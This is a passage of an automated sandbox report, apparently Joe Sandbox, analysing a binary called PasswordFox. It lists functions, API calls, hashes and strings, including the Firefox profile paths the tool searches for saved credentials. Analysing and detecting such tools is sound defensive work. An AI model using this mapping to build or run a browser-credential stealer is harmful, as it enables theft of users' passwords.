                                        • Opcode Fuzzy Hash: b6872d8eefeebd306552a5b8be504b41ed2c6867e2c7576c2d210665d0b67c59
                                        • Instruction Fuzzy Hash: 1421BCB1A01704CFC6209F769C89A57B7E8EF44701F550A3FE45AA7292DF7968008F1C
                                        Function 00409A7A Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 53COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00409A96
                                        • memset.MSVCRT ref: 00409AAB
                                          • Part of subcall function 0040426C: wcslen.MSVCRT ref: 0040426D
                                          • Part of subcall function 0040426C: wcscat.MSVCRT ref: 00404285
                                        • wcscat.MSVCRT ref: 00409AD1
                                          • Part of subcall function 0040ACCC: memset.MSVCRT ref: 0040AD0B
                                          • Part of subcall function 0040ACCC: wcscpy.MSVCRT ref: 0040AD34
                                          • Part of subcall function 0040ACCC: RegCloseKey.ADVAPI32(?,?,?,?,00000208,?,?,?,?,?,00000000), ref: 0040AD56
                                          • Part of subcall function 0040ACCC: wcscpy.MSVCRT ref: 0040AD65
                                        • wcscat.MSVCRT ref: 00409AF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memsetwcscat$wcscpy$Closewcslen
                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                        • API String ID: 3470772675-1174173950
                                        • Opcode ID: ef051dff077b42edc146f8091b62d72c49959b948a275e392804958870f54f5a
                                        • Instruction ID: e450e6f8c22090b410cdc717a0411dff650a31d8cce9db24ae5aa5b386eac940
                                        • Opcode Fuzzy Hash: ef051dff077b42edc146f8091b62d72c49959b948a275e392804958870f54f5a
                                        • Instruction Fuzzy Hash: DA0144B194031C76DB10BB668C85EDB762CDF54758F0145BEB508B7283DA7C8E848AAD
                                        Function 0040A8E8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0040A914
                                          • Part of subcall function 00404B1B: _snwprintf.MSVCRT ref: 00404B60
                                          • Part of subcall function 00404B1B: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00404B70
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040A93D
                                        • memset.MSVCRT ref: 0040A947
                                        • GetPrivateProfileStringW.KERNEL32(?,?,0040C3EC,?,00002000,?), ref: 0040A969
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                        • String ID:
                                        • API String ID: 1127616056-0
                                        • Opcode ID: 6a0ac252d82ab6e45e5f06d70d27481721c8405b463265ea49a1192a337e88bf
                                        • Instruction ID: 0805f05f1c84009111371c571d81c39805b3661e97e83790b4cfa5a877832717
                                        • Opcode Fuzzy Hash: 6a0ac252d82ab6e45e5f06d70d27481721c8405b463265ea49a1192a337e88bf
                                        • Instruction Fuzzy Hash: E7115AB2500119AEDF116FA4DC42E9A7B69EF44710F10016AFF05B20A1E635AA648BAD
                                        Function 0040ABFC Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 355 40abfc-40ac13 FindResourceW 356 40ac15-40ac24 SizeofResource 355->356 357 40ac7a-40ac7f 355->357 358 40ac26-40ac32 LoadResource 356->358 359 40ac79 356->359 358->359 360 40ac34-40ac3d LockResource 358->360 359->357 360->359 361 40ac3f-40ac4d 360->361 362 40ac6b-40ac74 361->362 363 40ac4f 361->363 362->359 364 40ac50-40ac68 363->364 364->364 365 40ac6a 364->365 365->362
                                        APIs
                                        • FindResourceW.KERNELBASE(?,?,?), ref: 0040AC09
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040AC1A
                                        • LoadResource.KERNEL32(?,00000000), ref: 0040AC2A
                                        • LockResource.KERNEL32(00000000), ref: 0040AC35
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: 8cb0c87eb665ef4ca7cdfd21abe61c397a1d3518edcc97c4763dfbde86b55a16
                                        • Instruction ID: 2c60b31dc6434aee2e4e2b3c13c974902f5cecfa849892c0ca8faa8051fc444b
                                        • Opcode Fuzzy Hash: 8cb0c87eb665ef4ca7cdfd21abe61c397a1d3518edcc97c4763dfbde86b55a16
                                        • Instruction Fuzzy Hash: 5C01C432700315EBDB155FA5DE89D5F7F5AFB853903098036F809E6261D731C851CAC8
                                        Function 0040B812 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 366 40b812-40b819 367 40b822-40b829 366->367 368 40b81b-40b821 ??3@YAXPAX@Z 366->368 369 40b832-40b839 367->369 370 40b82b-40b831 ??3@YAXPAX@Z 367->370 368->367 371 40b842-40b849 369->371 372 40b83b-40b841 ??3@YAXPAX@Z 369->372 370->369 373 40b852 371->373 374 40b84b-40b851 ??3@YAXPAX@Z 371->374 372->371 374->373
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 2f632474f803a20cbab500e3e12bf64a4bbfccd9dcfb8c6282e2b96356ee3b1f
                                        • Instruction ID: db67ca1e18e80713947d2ac5a7d392e0cf7686e501c2c923b77a16c228a3621d
                                        • Opcode Fuzzy Hash: 2f632474f803a20cbab500e3e12bf64a4bbfccd9dcfb8c6282e2b96356ee3b1f
                                        • Instruction Fuzzy Hash: F6E0026270420566DA14BB7AA849A5623DCEA54768394C43EB804F62E2DF7DD98086AC
                                        Function 004022E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 375 4022e3-4022f7 376 4022f9 375->376 377 4022ff-402311 call 403e9b 375->377 376->377 379 402316-402319 377->379 380 402325-40232e 379->380 381 40231b-40231e 379->381 382 402330-402350 call 4053f1 GetParent MessageBoxW 380->382 383 402351-402352 380->383 381->380 384 402320-402323 381->384 382->383 384->380 384->383
                                        APIs
                                        • GetParent.USER32 ref: 00402343
                                        • MessageBoxW.USER32(00000000,?,00000000,PasswordFox), ref: 0040234A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageParent
                                        • String ID: PasswordFox
                                        • API String ID: 4240588283-3917124896
                                        • Opcode ID: 4ffc64a8673cc388c6c70b302c6cca5c2f78c4675569d5824536564ce1fff22d
                                        • Instruction ID: ed9e1bc081cff98ac065e45372b1d485f6bee123588fbeea4320e2687ef7ea35
                                        • Opcode Fuzzy Hash: 4ffc64a8673cc388c6c70b302c6cca5c2f78c4675569d5824536564ce1fff22d
                                        • Instruction Fuzzy Hash: 7BF04472440110EBD7299B64DD8DFD73358EB08301F15057BF945E21E1DBBC9944CB58
                                        Function 0040534F Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,004053FF,00402460,PasswordFox), ref: 00405389
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053A7
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053C5
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053E3
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: e0a6fb643f5fe0e917eddc980f966602776b1e2d87de5879e0afff261d85d5fd
                                        • Instruction ID: e8b0150b500b9fb94e561af83bb343bd3fc12ffd0ff5e4b3ea63fe4e96505450
                                        • Opcode Fuzzy Hash: e0a6fb643f5fe0e917eddc980f966602776b1e2d87de5879e0afff261d85d5fd
                                        • Instruction Fuzzy Hash: B6010CB13412006FE759DB38ED4BBAE7694E748354F04813EA606991F5EBFE45808B48
                                        Function 0040492B Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040980B,00000000,?,00000000,0040F058,?), ref: 00404943
                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 00404957
                                        • CloseHandle.KERNELBASE(00000000), ref: 00404960
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: 099d0484998da8a14ec28789afba2c9d87259674d141d9485c3d01d374ce5e64
                                        • Instruction ID: 298ecb40693a020ddc78f41bc06a78c83cbfe612b60dd1d70e3574b6aeb36a4e
                                        • Opcode Fuzzy Hash: 099d0484998da8a14ec28789afba2c9d87259674d141d9485c3d01d374ce5e64
                                        • Instruction Fuzzy Hash: EFE04F32201250F7E2311B76AD4CF4B2E7DEBC6B61F150638BA55F21E086304905C664
                                        Function 004044DF Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • malloc.MSVCRT ref: 004044FB
                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004025D1,00000002,?,?,?,00401C46,?), ref: 00404513
                                        • free.MSVCRT ref: 0040451C
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID:
                                        • API String ID: 3056473165-0
                                        • Opcode ID: 4eaa0b47f31daf78e94fe8ac6f8a088c94e0d5bc5a45c4b24aaaf9302ad6429d
                                        • Instruction ID: 434e3b53aff2dcbe856e5c5cb84ae4e4ed9f6ab48ee54a21ca6fa3f7400b0f26
                                        • Opcode Fuzzy Hash: 4eaa0b47f31daf78e94fe8ac6f8a088c94e0d5bc5a45c4b24aaaf9302ad6429d
                                        • Instruction Fuzzy Hash: 05F0E9B26042226FC708EA75BD8141BB39DEF84324B10483FF604E72D2D7389C40CBA8
                                        Function 00407725 Relevance: 3.1, APIs: 2, Instructions: 123COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040652D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040654F
                                          • Part of subcall function 0040652D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004065E4
                                          • Part of subcall function 0040422F: CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,004075C9,?), ref: 00404241
                                        • CloseHandle.KERNELBASE(00000000), ref: 00407841
                                        • SetCursor.USER32 ref: 0040784D
                                          • Part of subcall function 00404AFC: WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,00402151,?,?,00000000,?), ref: 00404B13
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$??2@??3@CloseCreateCursorHandleWrite
                                        • String ID:
                                        • API String ID: 2042149353-0
                                        • Opcode ID: 5bcfebfb05ffab3cff6fb40d36c219062c518226d88367abd10300752479f63f
                                        • Instruction ID: ce0150e2a1934f20a231fe5269dbc5c614e60fe21b72d12459088bc7724df02a
                                        • Opcode Fuzzy Hash: 5bcfebfb05ffab3cff6fb40d36c219062c518226d88367abd10300752479f63f
                                        • Instruction Fuzzy Hash: 4241A771B04200ABCB24AF69C889F5F77B5AF48751F11443FF50AA72D1C778AD80CA5A
                                        Function 00409482 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /stext
                                        • API String ID: 2081463915-3817206916
                                        • Opcode ID: 9f8f5a68f2815c0efa00b550acdf10f450f8974f42bb8ab270a844e242b1339c
                                        • Instruction ID: 9c5cbb8595cb5f37f0e4e444d7c9b1f6e090ba970fdb21cd24ce0f6d0ac42327
                                        • Opcode Fuzzy Hash: 9f8f5a68f2815c0efa00b550acdf10f450f8974f42bb8ab270a844e242b1339c
                                        • Instruction Fuzzy Hash: 05218675A041059FDB00EF5AC881A9D77BAEF84314F1441BBEC09EB783DA39AD018B54
                                        Function 00416951 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,00001000,00000004), ref: 004169BE
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: d66d290de48dbb0968744cb0dd13d2a634fd2ae4904781f4cb3653dca6444dc6
                                        • Instruction ID: ecdd3619ebd3b9a4ffef280da4697ca3d29965bf2604d1a900d4b347dfa1a2d7
                                        • Opcode Fuzzy Hash: d66d290de48dbb0968744cb0dd13d2a634fd2ae4904781f4cb3653dca6444dc6
                                        • Instruction Fuzzy Hash: ED1136B11586056BE7218720CC40FFAB7ECEF82359F14041AE59ECB281C778AC82866A
                                        Function 004097C9 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409857: memset.MSVCRT ref: 0040989F
                                          • Part of subcall function 00409857: wcslen.MSVCRT ref: 004098B6
                                          • Part of subcall function 00409857: wcslen.MSVCRT ref: 004098BE
                                          • Part of subcall function 00409857: wcslen.MSVCRT ref: 00409917
                                          • Part of subcall function 00409857: wcslen.MSVCRT ref: 00409925
                                          • Part of subcall function 0040492B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040980B,00000000,?,00000000,0040F058,?), ref: 00404943
                                          • Part of subcall function 0040492B: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 00404957
                                          • Part of subcall function 0040492B: CloseHandle.KERNELBASE(00000000), ref: 00404960
                                        • CompareFileTime.KERNEL32(?,?,00000000,0040F058,?), ref: 00409815
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcslen$File$Time$CloseCompareCreateHandlememset
                                        • String ID:
                                        • API String ID: 4204647287-0
                                        • Opcode ID: 2fd969ae10e9a7647b8264f90c700334f4a79a9bfa9685d4675750983c512357
                                        • Instruction ID: a5ef1dc86d43929149c1d8df48362da23ece48953bb29e8e2ac8fb51ce5dde06
                                        • Opcode Fuzzy Hash: 2fd969ae10e9a7647b8264f90c700334f4a79a9bfa9685d4675750983c512357
                                        • Instruction Fuzzy Hash: 2111E8B2C00218ABCB01EBA5D9815DEBBB9EF45714F20447BEA11F7281D638AF45CB95
                                        Function 0040A98E Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 0040A9B5
                                          • Part of subcall function 0040A89B: memset.MSVCRT ref: 0040A8BA
                                          • Part of subcall function 0040A89B: _itow.MSVCRT ref: 0040A8D1
                                          • Part of subcall function 0040A89B: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040A8E0
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                        • String ID:
                                        • API String ID: 4232544981-0
                                        • Opcode ID: 8cf7ce25f3698bb1f637df75d03540d81c4b233c423e50ce57ac638467d3589c
                                        • Instruction ID: 59b0c09317d45d83cb723593fab99e5bd5744c4d9303db972c3971971dc29f30
                                        • Opcode Fuzzy Hash: 8cf7ce25f3698bb1f637df75d03540d81c4b233c423e50ce57ac638467d3589c
                                        • Instruction Fuzzy Hash: 34E0B632000209EFDF126F90EC05AAA7F66FF14314F54856AFD5824161D3369570EB99
                                        Function 00404AFC Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,00402151,?,?,00000000,?), ref: 00404B13
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: f7cb4ad073e445e46a170c7d98e7b835c3a4e02ef0d256329d2e1587878cb5e6
                                        • Instruction ID: 44ca31bac7325476affb0a5a8a4e30de110c9927306568b9f6297b12081be1b6
                                        • Opcode Fuzzy Hash: f7cb4ad073e445e46a170c7d98e7b835c3a4e02ef0d256329d2e1587878cb5e6
                                        • Instruction Fuzzy Hash: 09D0923511020DFBDF018F80DD06B997BA9EB04359F104054BA04A5060C7B59A10AB54
                                        Function 0040422F Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,004075C9,?), ref: 00404241
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: d0ba949ad9b50b68ba1127200d82895acdf54e83d8d154afa9823777d0696abf
                                        • Instruction ID: 44d22337fcbd2adc3911c2ead07481942fced3b3900b9a14d9a0842e99fa8d5a
                                        • Opcode Fuzzy Hash: d0ba949ad9b50b68ba1127200d82895acdf54e83d8d154afa9823777d0696abf
                                        • Instruction Fuzzy Hash: 54C092B0250200BEFE204B20AD4AF37265DD780700F5085207E41E40E0C2A14C488524
                                        Function 00405225 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
